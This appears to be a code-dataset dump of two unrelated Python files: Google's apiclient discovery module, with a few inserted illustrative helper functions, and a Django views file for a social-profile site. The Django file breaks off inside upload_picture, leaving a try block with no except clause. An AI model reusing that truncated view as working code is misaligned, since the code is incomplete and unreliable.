harshilasu/GraphicMelon | y/google-cloud-sdk/.install/.backup/lib/apiclient/discovery.py | 5 | 37418 | # Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Client for discovery based APIs.
A client library for Google's discovery based APIs.
"""
__all__ = [
'build',
'build_from_document',
'fix_method_name',
'key2param',
]
# Standard library imports
import StringIO
import copy
from email.generator import Generator
from email.mime.multipart import MIMEMultipart
from email.mime.nonmultipart import MIMENonMultipart
import json
import keyword
import logging
import mimetypes
import os
import re
import urllib
import urlparse
try:
from urlparse import parse_qsl
except ImportError:
from cgi import parse_qsl
# Third-party imports
import httplib2
import mimeparse
import uritemplate
# Local imports
from apiclient.errors import HttpError
from apiclient.errors import InvalidJsonError
from apiclient.errors import MediaUploadSizeError
from apiclient.errors import UnacceptableMimeTypeError
from apiclient.errors import UnknownApiNameOrVersion
from apiclient.errors import UnknownFileType
from apiclient.http import HttpRequest
from apiclient.http import MediaFileUpload
from apiclient.http import MediaUpload
from apiclient.model import JsonModel
from apiclient.model import MediaModel
from apiclient.model import RawModel
from apiclient.schema import Schemas
from oauth2client.client import GoogleCredentials
from oauth2client.util import _add_query_parameter
from oauth2client.util import positional
# The client library requires a version of httplib2 that supports RETRIES.
httplib2.RETRIES = 1
logger = logging.getLogger(__name__)
URITEMPLATE = re.compile('{[^}]*}')
VARNAME = re.compile('[a-zA-Z0-9_-]+')
DISCOVERY_URI = ('https://www.googleapis.com/discovery/v1/apis/'
'{api}/{apiVersion}/rest')
DEFAULT_METHOD_DOC = 'A description of how to use this function'
HTTP_PAYLOAD_METHODS = frozenset(['PUT', 'POST', 'PATCH'])
_MEDIA_SIZE_BIT_SHIFTS = {'KB': 10, 'MB': 20, 'GB': 30, 'TB': 40}
BODY_PARAMETER_DEFAULT_VALUE = {
'description': 'The request body.',
'type': 'object',
'required': True,
}
MEDIA_BODY_PARAMETER_DEFAULT_VALUE = {
'description': ('The filename of the media request body, or an instance '
'of a MediaUpload object.'),
'type': 'string',
'required': False,
}
# Parameters accepted by the stack, but not visible via discovery.
# TODO(dhermes): Remove 'userip' in 'v2'.
STACK_QUERY_PARAMETERS = frozenset(['trace', 'pp', 'userip', 'strict'])
STACK_QUERY_PARAMETER_DEFAULT_VALUE = {'type': 'string', 'location': 'query'}
# Library-specific reserved words beyond Python keywords.
RESERVED_WORDS = frozenset(['body'])
def fix_method_name(name):
"""Fix method names to avoid reserved word conflicts.
Args:
name: string, method name.
Returns:
The name with a '_' prefixed if the name is a reserved word.
"""
if keyword.iskeyword(name) or name in RESERVED_WORDS:
return name + '_'
else:
return name
def key2param(key):
"""Converts key names into parameter names.
For example, converting "max-results" -> "max_results"
Args:
key: string, the method key name.
Returns:
A safe method name based on the key name.
"""
result = []
key = list(key)
if not key[0].isalpha():
result.append('x')
for c in key:
if c.isalnum():
result.append(c)
else:
result.append('_')
return ''.join(result)
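# Illustrative sketch (not part of the original module): the mappings below
# follow directly from the key2param logic above.
def _key2param_examples():
  """Show how wire-format parameter names become safe Python names."""
  assert key2param('max-results') == 'max_results'
  assert key2param('123_token') == 'x123_token'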
@positional(2)
def build(serviceName,
version,
http=None,
discoveryServiceUrl=DISCOVERY_URI,
developerKey=None,
model=None,
requestBuilder=HttpRequest,
credentials=None):
"""Construct a Resource for interacting with an API.
Construct a Resource object for interacting with an API. The serviceName and
version are the names from the Discovery service.
Args:
serviceName: string, name of the service.
version: string, the version of the service.
http: httplib2.Http, An instance of httplib2.Http or something that acts
like it that HTTP requests will be made through.
discoveryServiceUrl: string, a URI Template that points to the location of
the discovery service. It should have two parameters {api} and
{apiVersion} that when filled in produce an absolute URI to the discovery
document for that service.
developerKey: string, key obtained from
https://code.google.com/apis/console.
model: apiclient.Model, converts to and from the wire format.
requestBuilder: apiclient.http.HttpRequest, encapsulator for an HTTP
request.
credentials: oauth2client.Credentials, credentials to be used for
authentication.
Returns:
A Resource object with methods for interacting with the service.
"""
params = {
'api': serviceName,
'apiVersion': version
}
if http is None:
http = httplib2.Http()
requested_url = uritemplate.expand(discoveryServiceUrl, params)
# REMOTE_ADDR is defined by the CGI spec [RFC3875] as the environment
# variable that contains the network address of the client sending the
# request. If it exists then add that to the request for the discovery
# document to avoid exceeding the quota on discovery requests.
if 'REMOTE_ADDR' in os.environ:
requested_url = _add_query_parameter(requested_url, 'userIp',
os.environ['REMOTE_ADDR'])
logger.info('URL being requested: GET %s' % requested_url)
resp, content = http.request(requested_url)
if resp.status == 404:
raise UnknownApiNameOrVersion("name: %s version: %s" % (serviceName,
version))
if resp.status >= 400:
raise HttpError(resp, content, uri=requested_url)
try:
service = json.loads(content)
except ValueError, e:
logger.error('Failed to parse as JSON: ' + content)
raise InvalidJsonError()
return build_from_document(content, base=discoveryServiceUrl, http=http,
developerKey=developerKey, model=model, requestBuilder=requestBuilder,
credentials=credentials)
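# Illustrative usage sketch (not part of the original module). The service
# name, version and collection below are placeholders; a real call needs
# network access to the discovery endpoint and, usually, credentials.
#
#   http = httplib2.Http()
#   service = build('drive', 'v2', http=http)
#   request = service.files().list()
#   response = request.execute()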
@positional(1)
def build_from_document(
service,
base=None,
future=None,
http=None,
developerKey=None,
model=None,
requestBuilder=HttpRequest,
credentials=None):
"""Create a Resource for interacting with an API.
Same as `build()`, but constructs the Resource object from a discovery
  document that it is given, as opposed to retrieving one over HTTP.
Args:
service: string or object, the JSON discovery document describing the API.
The value passed in may either be the JSON string or the deserialized
JSON.
base: string, base URI for all HTTP requests, usually the discovery URI.
This parameter is no longer used as rootUrl and servicePath are included
within the discovery document. (deprecated)
future: string, discovery document with future capabilities (deprecated).
http: httplib2.Http, An instance of httplib2.Http or something that acts
like it that HTTP requests will be made through.
developerKey: string, Key for controlling API usage, generated
from the API Console.
model: Model class instance that serializes and de-serializes requests and
responses.
requestBuilder: Takes an http request and packages it up to be executed.
credentials: object, credentials to be used for authentication.
Returns:
A Resource object with methods for interacting with the service.
"""
# future is no longer used.
future = {}
if isinstance(service, basestring):
service = json.loads(service)
base = urlparse.urljoin(service['rootUrl'], service['servicePath'])
schema = Schemas(service)
if credentials:
# If credentials were passed in, we could have two cases:
# 1. the scopes were specified, in which case the given credentials
# are used for authorizing the http;
# 2. the scopes were not provided (meaning the Application Default
# Credentials are to be used). In this case, the Application Default
# Credentials are built and used instead of the original credentials.
# If there are no scopes found (meaning the given service requires no
# authentication), there is no authorization of the http.
if (isinstance(credentials, GoogleCredentials) and
credentials.create_scoped_required()):
scopes = service.get('auth', {}).get('oauth2', {}).get('scopes', {})
if scopes:
credentials = credentials.create_scoped(scopes.keys())
else:
# No need to authorize the http object
# if the service does not require authentication.
credentials = None
if credentials:
http = credentials.authorize(http)
if model is None:
features = service.get('features', [])
model = JsonModel('dataWrapper' in features)
return Resource(http=http, baseUrl=base, model=model,
developerKey=developerKey, requestBuilder=requestBuilder,
resourceDesc=service, rootDesc=service, schema=schema)
def _cast(value, schema_type):
"""Convert value to a string based on JSON Schema type.
See http://tools.ietf.org/html/draft-zyp-json-schema-03 for more details on
JSON Schema.
Args:
value: any, the value to convert
schema_type: string, the type that value should be interpreted as
Returns:
A string representation of 'value' based on the schema_type.
"""
if schema_type == 'string':
if type(value) == type('') or type(value) == type(u''):
return value
else:
return str(value)
elif schema_type == 'integer':
return str(int(value))
elif schema_type == 'number':
return str(float(value))
elif schema_type == 'boolean':
return str(bool(value)).lower()
else:
if type(value) == type('') or type(value) == type(u''):
return value
else:
return str(value)
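# Illustrative sketch (not part of the original module): a few conversions
# implied by the _cast logic above.
def _cast_examples():
  """Show how values are stringified according to a JSON Schema type."""
  assert _cast(7, 'integer') == '7'
  assert _cast(2.5, 'number') == '2.5'
  assert _cast(True, 'boolean') == 'true'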
def _media_size_to_long(maxSize):
"""Convert a string media size, such as 10GB or 3TB into an integer.
Args:
maxSize: string, size as a string, such as 2MB or 7GB.
Returns:
The size as an integer value.
"""
if len(maxSize) < 2:
return 0L
units = maxSize[-2:].upper()
bit_shift = _MEDIA_SIZE_BIT_SHIFTS.get(units)
if bit_shift is not None:
return long(maxSize[:-2]) << bit_shift
else:
return long(maxSize)
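# Illustrative sketch (not part of the original module): discovery documents
# express 'maxSize' as strings such as '5MB'; the helper above turns them into
# byte counts.
def _media_size_examples():
  """Show a couple of conversions implied by _media_size_to_long."""
  assert _media_size_to_long('5MB') == 5 * 2 ** 20
  assert _media_size_to_long('10GB') == 10 * 2 ** 30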
def _media_path_url_from_info(root_desc, path_url):
"""Creates an absolute media path URL.
Constructed using the API root URI and service path from the discovery
document and the relative path for the API method.
Args:
root_desc: Dictionary; the entire original deserialized discovery document.
path_url: String; the relative URL for the API method. Relative to the API
root, which is specified in the discovery document.
Returns:
String; the absolute URI for media upload for the API method.
"""
return '%(root)supload/%(service_path)s%(path)s' % {
'root': root_desc['rootUrl'],
'service_path': root_desc['servicePath'],
'path': path_url,
}
def _fix_up_parameters(method_desc, root_desc, http_method):
"""Updates parameters of an API method with values specific to this library.
Specifically, adds whatever global parameters are specified by the API to the
parameters for the individual method. Also adds parameters which don't
appear in the discovery document, but are available to all discovery based
APIs (these are listed in STACK_QUERY_PARAMETERS).
SIDE EFFECTS: This updates the parameters dictionary object in the method
description.
Args:
method_desc: Dictionary with metadata describing an API method. Value comes
from the dictionary of methods stored in the 'methods' key in the
deserialized discovery document.
root_desc: Dictionary; the entire original deserialized discovery document.
http_method: String; the HTTP method used to call the API method described
in method_desc.
Returns:
The updated Dictionary stored in the 'parameters' key of the method
description dictionary.
"""
parameters = method_desc.setdefault('parameters', {})
# Add in the parameters common to all methods.
for name, description in root_desc.get('parameters', {}).iteritems():
parameters[name] = description
# Add in undocumented query parameters.
for name in STACK_QUERY_PARAMETERS:
parameters[name] = STACK_QUERY_PARAMETER_DEFAULT_VALUE.copy()
# Add 'body' (our own reserved word) to parameters if the method supports
# a request payload.
if http_method in HTTP_PAYLOAD_METHODS and 'request' in method_desc:
body = BODY_PARAMETER_DEFAULT_VALUE.copy()
body.update(method_desc['request'])
parameters['body'] = body
return parameters
def _fix_up_media_upload(method_desc, root_desc, path_url, parameters):
"""Updates parameters of API by adding 'media_body' if supported by method.
SIDE EFFECTS: If the method supports media upload and has a required body,
sets body to be optional (required=False) instead. Also, if there is a
'mediaUpload' in the method description, adds 'media_upload' key to
parameters.
Args:
method_desc: Dictionary with metadata describing an API method. Value comes
from the dictionary of methods stored in the 'methods' key in the
deserialized discovery document.
root_desc: Dictionary; the entire original deserialized discovery document.
path_url: String; the relative URL for the API method. Relative to the API
root, which is specified in the discovery document.
parameters: A dictionary describing method parameters for method described
in method_desc.
Returns:
Triple (accept, max_size, media_path_url) where:
- accept is a list of strings representing what content types are
accepted for media upload. Defaults to empty list if not in the
discovery document.
- max_size is a long representing the max size in bytes allowed for a
media upload. Defaults to 0L if not in the discovery document.
- media_path_url is a String; the absolute URI for media upload for the
API method. Constructed using the API root URI and service path from
the discovery document and the relative path for the API method. If
media upload is not supported, this is None.
"""
media_upload = method_desc.get('mediaUpload', {})
accept = media_upload.get('accept', [])
max_size = _media_size_to_long(media_upload.get('maxSize', ''))
media_path_url = None
if media_upload:
media_path_url = _media_path_url_from_info(root_desc, path_url)
parameters['media_body'] = MEDIA_BODY_PARAMETER_DEFAULT_VALUE.copy()
if 'body' in parameters:
parameters['body']['required'] = False
return accept, max_size, media_path_url
def _fix_up_method_description(method_desc, root_desc):
"""Updates a method description in a discovery document.
SIDE EFFECTS: Changes the parameters dictionary in the method description with
extra parameters which are used locally.
Args:
method_desc: Dictionary with metadata describing an API method. Value comes
from the dictionary of methods stored in the 'methods' key in the
deserialized discovery document.
root_desc: Dictionary; the entire original deserialized discovery document.
Returns:
Tuple (path_url, http_method, method_id, accept, max_size, media_path_url)
where:
- path_url is a String; the relative URL for the API method. Relative to
the API root, which is specified in the discovery document.
- http_method is a String; the HTTP method used to call the API method
described in the method description.
- method_id is a String; the name of the RPC method associated with the
API method, and is in the method description in the 'id' key.
- accept is a list of strings representing what content types are
accepted for media upload. Defaults to empty list if not in the
discovery document.
- max_size is a long representing the max size in bytes allowed for a
media upload. Defaults to 0L if not in the discovery document.
- media_path_url is a String; the absolute URI for media upload for the
API method. Constructed using the API root URI and service path from
the discovery document and the relative path for the API method. If
media upload is not supported, this is None.
"""
path_url = method_desc['path']
http_method = method_desc['httpMethod']
method_id = method_desc['id']
parameters = _fix_up_parameters(method_desc, root_desc, http_method)
# Order is important. `_fix_up_media_upload` needs `method_desc` to have a
# 'parameters' key and needs to know if there is a 'body' parameter because it
# also sets a 'media_body' parameter.
accept, max_size, media_path_url = _fix_up_media_upload(
method_desc, root_desc, path_url, parameters)
return path_url, http_method, method_id, accept, max_size, media_path_url
# TODO(dhermes): Convert this class to ResourceMethod and make it callable
class ResourceMethodParameters(object):
"""Represents the parameters associated with a method.
Attributes:
argmap: Map from method parameter name (string) to query parameter name
(string).
required_params: List of required parameters (represented by parameter
name as string).
repeated_params: List of repeated parameters (represented by parameter
name as string).
pattern_params: Map from method parameter name (string) to regular
expression (as a string). If the pattern is set for a parameter, the
value for that parameter must match the regular expression.
query_params: List of parameters (represented by parameter name as string)
that will be used in the query string.
path_params: Set of parameters (represented by parameter name as string)
that will be used in the base URL path.
param_types: Map from method parameter name (string) to parameter type. Type
can be any valid JSON schema type; valid values are 'any', 'array',
'boolean', 'integer', 'number', 'object', or 'string'. Reference:
http://tools.ietf.org/html/draft-zyp-json-schema-03#section-5.1
enum_params: Map from method parameter name (string) to list of strings,
where each list of strings is the list of acceptable enum values.
"""
def __init__(self, method_desc):
"""Constructor for ResourceMethodParameters.
Sets default values and defers to set_parameters to populate.
Args:
method_desc: Dictionary with metadata describing an API method. Value
comes from the dictionary of methods stored in the 'methods' key in
the deserialized discovery document.
"""
self.argmap = {}
self.required_params = []
self.repeated_params = []
self.pattern_params = {}
self.query_params = []
# TODO(dhermes): Change path_params to a list if the extra URITEMPLATE
# parsing is gotten rid of.
self.path_params = set()
self.param_types = {}
self.enum_params = {}
self.set_parameters(method_desc)
def set_parameters(self, method_desc):
"""Populates maps and lists based on method description.
Iterates through each parameter for the method and parses the values from
the parameter dictionary.
Args:
method_desc: Dictionary with metadata describing an API method. Value
comes from the dictionary of methods stored in the 'methods' key in
the deserialized discovery document.
"""
for arg, desc in method_desc.get('parameters', {}).iteritems():
param = key2param(arg)
self.argmap[param] = arg
if desc.get('pattern'):
self.pattern_params[param] = desc['pattern']
if desc.get('enum'):
self.enum_params[param] = desc['enum']
if desc.get('required'):
self.required_params.append(param)
if desc.get('repeated'):
self.repeated_params.append(param)
if desc.get('location') == 'query':
self.query_params.append(param)
if desc.get('location') == 'path':
self.path_params.add(param)
self.param_types[param] = desc.get('type', 'string')
# TODO(dhermes): Determine if this is still necessary. Discovery based APIs
# should have all path parameters already marked with
# 'location: path'.
for match in URITEMPLATE.finditer(method_desc['path']):
for namematch in VARNAME.finditer(match.group(0)):
name = key2param(namematch.group(0))
self.path_params.add(name)
if name in self.query_params:
self.query_params.remove(name)
def createMethod(methodName, methodDesc, rootDesc, schema):
"""Creates a method for attaching to a Resource.
Args:
methodName: string, name of the method to use.
methodDesc: object, fragment of deserialized discovery document that
describes the method.
rootDesc: object, the entire deserialized discovery document.
schema: object, mapping of schema names to schema descriptions.
"""
methodName = fix_method_name(methodName)
(pathUrl, httpMethod, methodId, accept,
maxSize, mediaPathUrl) = _fix_up_method_description(methodDesc, rootDesc)
parameters = ResourceMethodParameters(methodDesc)
def method(self, **kwargs):
# Don't bother with doc string, it will be over-written by createMethod.
for name in kwargs.iterkeys():
if name not in parameters.argmap:
raise TypeError('Got an unexpected keyword argument "%s"' % name)
# Remove args that have a value of None.
keys = kwargs.keys()
for name in keys:
if kwargs[name] is None:
del kwargs[name]
for name in parameters.required_params:
if name not in kwargs:
raise TypeError('Missing required parameter "%s"' % name)
for name, regex in parameters.pattern_params.iteritems():
if name in kwargs:
if isinstance(kwargs[name], basestring):
pvalues = [kwargs[name]]
else:
pvalues = kwargs[name]
for pvalue in pvalues:
if re.match(regex, pvalue) is None:
raise TypeError(
'Parameter "%s" value "%s" does not match the pattern "%s"' %
(name, pvalue, regex))
for name, enums in parameters.enum_params.iteritems():
if name in kwargs:
# We need to handle the case of a repeated enum
# name differently, since we want to handle both
# arg='value' and arg=['value1', 'value2']
if (name in parameters.repeated_params and
not isinstance(kwargs[name], basestring)):
values = kwargs[name]
else:
values = [kwargs[name]]
for value in values:
if value not in enums:
raise TypeError(
'Parameter "%s" value "%s" is not an allowed value in "%s"' %
(name, value, str(enums)))
actual_query_params = {}
actual_path_params = {}
for key, value in kwargs.iteritems():
to_type = parameters.param_types.get(key, 'string')
# For repeated parameters we cast each member of the list.
if key in parameters.repeated_params and type(value) == type([]):
cast_value = [_cast(x, to_type) for x in value]
else:
cast_value = _cast(value, to_type)
if key in parameters.query_params:
actual_query_params[parameters.argmap[key]] = cast_value
if key in parameters.path_params:
actual_path_params[parameters.argmap[key]] = cast_value
body_value = kwargs.get('body', None)
media_filename = kwargs.get('media_body', None)
if self._developerKey:
actual_query_params['key'] = self._developerKey
model = self._model
if methodName.endswith('_media'):
model = MediaModel()
elif 'response' not in methodDesc:
model = RawModel()
headers = {}
headers, params, query, body = model.request(headers,
actual_path_params, actual_query_params, body_value)
expanded_url = uritemplate.expand(pathUrl, params)
url = urlparse.urljoin(self._baseUrl, expanded_url + query)
resumable = None
multipart_boundary = ''
if media_filename:
# Ensure we end up with a valid MediaUpload object.
if isinstance(media_filename, basestring):
(media_mime_type, encoding) = mimetypes.guess_type(media_filename)
if media_mime_type is None:
raise UnknownFileType(media_filename)
if not mimeparse.best_match([media_mime_type], ','.join(accept)):
raise UnacceptableMimeTypeError(media_mime_type)
media_upload = MediaFileUpload(media_filename,
mimetype=media_mime_type)
elif isinstance(media_filename, MediaUpload):
media_upload = media_filename
else:
raise TypeError('media_filename must be str or MediaUpload.')
# Check the maxSize
if maxSize > 0 and media_upload.size() > maxSize:
raise MediaUploadSizeError("Media larger than: %s" % maxSize)
# Use the media path uri for media uploads
expanded_url = uritemplate.expand(mediaPathUrl, params)
url = urlparse.urljoin(self._baseUrl, expanded_url + query)
if media_upload.resumable():
url = _add_query_parameter(url, 'uploadType', 'resumable')
if media_upload.resumable():
      # This is all we need to do for resumable: if the body exists it gets
      # sent in the first request, otherwise an empty body is sent.
resumable = media_upload
else:
# A non-resumable upload
if body is None:
# This is a simple media upload
headers['content-type'] = media_upload.mimetype()
body = media_upload.getbytes(0, media_upload.size())
url = _add_query_parameter(url, 'uploadType', 'media')
else:
# This is a multipart/related upload.
msgRoot = MIMEMultipart('related')
          # msgRoot should not write out its own headers
setattr(msgRoot, '_write_headers', lambda self: None)
# attach the body as one part
msg = MIMENonMultipart(*headers['content-type'].split('/'))
msg.set_payload(body)
msgRoot.attach(msg)
# attach the media as the second part
msg = MIMENonMultipart(*media_upload.mimetype().split('/'))
msg['Content-Transfer-Encoding'] = 'binary'
payload = media_upload.getbytes(0, media_upload.size())
msg.set_payload(payload)
msgRoot.attach(msg)
# encode the body: note that we can't use `as_string`, because
# it plays games with `From ` lines.
fp = StringIO.StringIO()
g = Generator(fp, mangle_from_=False)
g.flatten(msgRoot, unixfrom=False)
body = fp.getvalue()
multipart_boundary = msgRoot.get_boundary()
headers['content-type'] = ('multipart/related; '
'boundary="%s"') % multipart_boundary
url = _add_query_parameter(url, 'uploadType', 'multipart')
logger.info('URL being requested: %s %s' % (httpMethod,url))
return self._requestBuilder(self._http,
model.response,
url,
method=httpMethod,
body=body,
headers=headers,
methodId=methodId,
resumable=resumable)
docs = [methodDesc.get('description', DEFAULT_METHOD_DOC), '\n\n']
if len(parameters.argmap) > 0:
docs.append('Args:\n')
# Skip undocumented params and params common to all methods.
skip_parameters = rootDesc.get('parameters', {}).keys()
skip_parameters.extend(STACK_QUERY_PARAMETERS)
all_args = parameters.argmap.keys()
args_ordered = [key2param(s) for s in methodDesc.get('parameterOrder', [])]
# Move body to the front of the line.
if 'body' in all_args:
args_ordered.append('body')
for name in all_args:
if name not in args_ordered:
args_ordered.append(name)
for arg in args_ordered:
if arg in skip_parameters:
continue
repeated = ''
if arg in parameters.repeated_params:
repeated = ' (repeated)'
required = ''
if arg in parameters.required_params:
required = ' (required)'
paramdesc = methodDesc['parameters'][parameters.argmap[arg]]
paramdoc = paramdesc.get('description', 'A parameter')
if '$ref' in paramdesc:
docs.append(
(' %s: object, %s%s%s\n The object takes the'
' form of:\n\n%s\n\n') % (arg, paramdoc, required, repeated,
schema.prettyPrintByName(paramdesc['$ref'])))
else:
paramtype = paramdesc.get('type', 'string')
docs.append(' %s: %s, %s%s%s\n' % (arg, paramtype, paramdoc, required,
repeated))
enum = paramdesc.get('enum', [])
enumDesc = paramdesc.get('enumDescriptions', [])
if enum and enumDesc:
docs.append(' Allowed values\n')
for (name, desc) in zip(enum, enumDesc):
docs.append(' %s - %s\n' % (name, desc))
if 'response' in methodDesc:
if methodName.endswith('_media'):
docs.append('\nReturns:\n The media object as a string.\n\n ')
else:
docs.append('\nReturns:\n An object of the form:\n\n ')
docs.append(schema.prettyPrintSchema(methodDesc['response']))
setattr(method, '__doc__', ''.join(docs))
return (methodName, method)
def createNextMethod(methodName):
"""Creates any _next methods for attaching to a Resource.
The _next methods allow for easy iteration through list() responses.
Args:
methodName: string, name of the method to use.
"""
methodName = fix_method_name(methodName)
def methodNext(self, previous_request, previous_response):
"""Retrieves the next page of results.
Args:
previous_request: The request for the previous page. (required)
previous_response: The response from the request for the previous page. (required)
Returns:
A request object that you can call 'execute()' on to request the next
page. Returns None if there are no more items in the collection.
"""
# Retrieve nextPageToken from previous_response
# Use as pageToken in previous_request to create new request.
if 'nextPageToken' not in previous_response:
return None
request = copy.copy(previous_request)
pageToken = previous_response['nextPageToken']
parsed = list(urlparse.urlparse(request.uri))
q = parse_qsl(parsed[4])
# Find and remove old 'pageToken' value from URI
newq = [(key, value) for (key, value) in q if key != 'pageToken']
newq.append(('pageToken', pageToken))
parsed[4] = urllib.urlencode(newq)
uri = urlparse.urlunparse(parsed)
request.uri = uri
logger.info('URL being requested: %s %s' % (methodName,uri))
return request
return (methodName, methodNext)
class Resource(object):
"""A class for interacting with a resource."""
def __init__(self, http, baseUrl, model, requestBuilder, developerKey,
resourceDesc, rootDesc, schema):
"""Build a Resource from the API description.
Args:
http: httplib2.Http, Object to make http requests with.
baseUrl: string, base URL for the API. All requests are relative to this
URI.
model: apiclient.Model, converts to and from the wire format.
requestBuilder: class or callable that instantiates an
apiclient.HttpRequest object.
developerKey: string, key obtained from
https://code.google.com/apis/console
resourceDesc: object, section of deserialized discovery document that
describes a resource. Note that the top level discovery document
is considered a resource.
rootDesc: object, the entire deserialized discovery document.
schema: object, mapping of schema names to schema descriptions.
"""
self._dynamic_attrs = []
self._http = http
self._baseUrl = baseUrl
self._model = model
self._developerKey = developerKey
self._requestBuilder = requestBuilder
self._resourceDesc = resourceDesc
self._rootDesc = rootDesc
self._schema = schema
self._set_service_methods()
def _set_dynamic_attr(self, attr_name, value):
"""Sets an instance attribute and tracks it in a list of dynamic attributes.
Args:
attr_name: string; The name of the attribute to be set
value: The value being set on the object and tracked in the dynamic cache.
"""
self._dynamic_attrs.append(attr_name)
self.__dict__[attr_name] = value
def __getstate__(self):
"""Trim the state down to something that can be pickled.
Uses the fact that the instance variable _dynamic_attrs holds attrs that
will be wiped and restored on pickle serialization.
"""
state_dict = copy.copy(self.__dict__)
for dynamic_attr in self._dynamic_attrs:
del state_dict[dynamic_attr]
del state_dict['_dynamic_attrs']
return state_dict
def __setstate__(self, state):
"""Reconstitute the state of the object from being pickled.
Uses the fact that the instance variable _dynamic_attrs holds attrs that
will be wiped and restored on pickle serialization.
"""
self.__dict__.update(state)
self._dynamic_attrs = []
self._set_service_methods()
def _set_service_methods(self):
self._add_basic_methods(self._resourceDesc, self._rootDesc, self._schema)
self._add_nested_resources(self._resourceDesc, self._rootDesc, self._schema)
self._add_next_methods(self._resourceDesc, self._schema)
def _add_basic_methods(self, resourceDesc, rootDesc, schema):
# Add basic methods to Resource
if 'methods' in resourceDesc:
for methodName, methodDesc in resourceDesc['methods'].iteritems():
fixedMethodName, method = createMethod(
methodName, methodDesc, rootDesc, schema)
self._set_dynamic_attr(fixedMethodName,
method.__get__(self, self.__class__))
# Add in _media methods. The functionality of the attached method will
# change when it sees that the method name ends in _media.
if methodDesc.get('supportsMediaDownload', False):
fixedMethodName, method = createMethod(
methodName + '_media', methodDesc, rootDesc, schema)
self._set_dynamic_attr(fixedMethodName,
method.__get__(self, self.__class__))
def _add_nested_resources(self, resourceDesc, rootDesc, schema):
# Add in nested resources
if 'resources' in resourceDesc:
def createResourceMethod(methodName, methodDesc):
"""Create a method on the Resource to access a nested Resource.
Args:
methodName: string, name of the method to use.
methodDesc: object, fragment of deserialized discovery document that
describes the method.
"""
methodName = fix_method_name(methodName)
def methodResource(self):
return Resource(http=self._http, baseUrl=self._baseUrl,
model=self._model, developerKey=self._developerKey,
requestBuilder=self._requestBuilder,
resourceDesc=methodDesc, rootDesc=rootDesc,
schema=schema)
setattr(methodResource, '__doc__', 'A collection resource.')
setattr(methodResource, '__is_resource__', True)
return (methodName, methodResource)
for methodName, methodDesc in resourceDesc['resources'].iteritems():
fixedMethodName, method = createResourceMethod(methodName, methodDesc)
self._set_dynamic_attr(fixedMethodName,
method.__get__(self, self.__class__))
def _add_next_methods(self, resourceDesc, schema):
# Add _next() methods
# Look for response bodies in schema that contain nextPageToken, and methods
# that take a pageToken parameter.
if 'methods' in resourceDesc:
for methodName, methodDesc in resourceDesc['methods'].iteritems():
if 'response' in methodDesc:
responseSchema = methodDesc['response']
if '$ref' in responseSchema:
responseSchema = schema.get(responseSchema['$ref'])
hasNextPageToken = 'nextPageToken' in responseSchema.get('properties',
{})
hasPageToken = 'pageToken' in methodDesc.get('parameters', {})
if hasNextPageToken and hasPageToken:
fixedMethodName, method = createNextMethod(methodName + '_next')
self._set_dynamic_attr(fixedMethodName,
method.__get__(self, self.__class__))
| gpl-3.0 | -8,657,726,699,740,054,000 | 36.60603 | 84 | 0.669704 | false |
drakeloud/louderdev | louderdev/core/views.py | 1 | 5391 | import os
from django.conf import settings as django_settings
from django.contrib import messages
from django.contrib.auth import update_session_auth_hash
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator
from django.shortcuts import get_object_or_404, redirect, render
from louderdev.core.forms import ChangePasswordForm, ProfileForm
from louderdev.feeds.models import Feed
from louderdev.feeds.views import FEEDS_NUM_PAGES, feeds
from PIL import Image
# def home(request):
# return render(request, 'core/home.html')
def profilehome(request):
if request.user.is_authenticated():
return feeds(request)
else:
return render(request, 'core/cover.html')
@login_required
def network(request):
users_list = User.objects.filter(is_active=True).order_by('username')
paginator = Paginator(users_list, 100)
page = request.GET.get('page')
try:
users = paginator.page(page)
except PageNotAnInteger:
users = paginator.page(1)
except EmptyPage:
users = paginator.page(paginator.num_pages)
return render(request, 'core/network.html', {'users': users})
@login_required
def profile(request, username):
page_user = get_object_or_404(User, username=username)
all_feeds = Feed.get_feeds().filter(user=page_user)
paginator = Paginator(all_feeds, FEEDS_NUM_PAGES)
feeds = paginator.page(1)
from_feed = -1
if feeds:
from_feed = feeds[0].id
return render(request, 'core/profile.html', {
'page_user': page_user,
'feeds': feeds,
'from_feed': from_feed,
'page': 1
})
@login_required
def settings(request):
user = request.user
if request.method == 'POST':
form = ProfileForm(request.POST)
if form.is_valid():
user.first_name = form.cleaned_data.get('first_name')
user.last_name = form.cleaned_data.get('last_name')
user.profile.job_title = form.cleaned_data.get('job_title')
user.email = form.cleaned_data.get('email')
user.profile.url = form.cleaned_data.get('url')
user.profile.location = form.cleaned_data.get('location')
user.save()
messages.add_message(request,
messages.SUCCESS,
'Your profile was successfully edited.')
else:
form = ProfileForm(instance=user, initial={
'job_title': user.profile.job_title,
'url': user.profile.url,
'location': user.profile.location
})
return render(request, 'core/settings.html', {'form': form})
@login_required
def picture(request):
uploaded_picture = False
try:
if request.GET.get('upload_picture') == 'uploaded':
uploaded_picture = True
except Exception:
pass
return render(request, 'core/picture.html',
{'uploaded_picture': uploaded_picture})
@login_required
def password(request):
user = request.user
if request.method == 'POST':
form = ChangePasswordForm(request.POST)
if form.is_valid():
new_password = form.cleaned_data.get('new_password')
user.set_password(new_password)
user.save()
update_session_auth_hash(request, user)
messages.add_message(request, messages.SUCCESS,
'Your password was successfully changed.')
return redirect('password')
else:
form = ChangePasswordForm(instance=user)
return render(request, 'core/password.html', {'form': form})
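# The two views below implement a two-step profile-picture flow:
# upload_picture stores a temporary '<username>_tmp.jpg' scaled down to at
# most 350px wide, and save_uploaded_picture crops the region selected by the
# user, shrinks it to fit within 200x200, saves '<username>.jpg' and deletes
# the temporary file.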
@login_required
def upload_picture(request):
try:
profile_pictures = django_settings.MEDIA_ROOT + '/profile_pictures/'
if not os.path.exists(profile_pictures):
os.makedirs(profile_pictures)
f = request.FILES['picture']
filename = profile_pictures + request.user.username + '_tmp.jpg'
with open(filename, 'wb+') as destination:
for chunk in f.chunks():
destination.write(chunk)
im = Image.open(filename)
width, height = im.size
if width > 350:
new_width = 350
new_height = (height * 350) / width
new_size = new_width, new_height
im.thumbnail(new_size, Image.ANTIALIAS)
im.save(filename)
return redirect('/settings/picture/?upload_picture=uploaded')
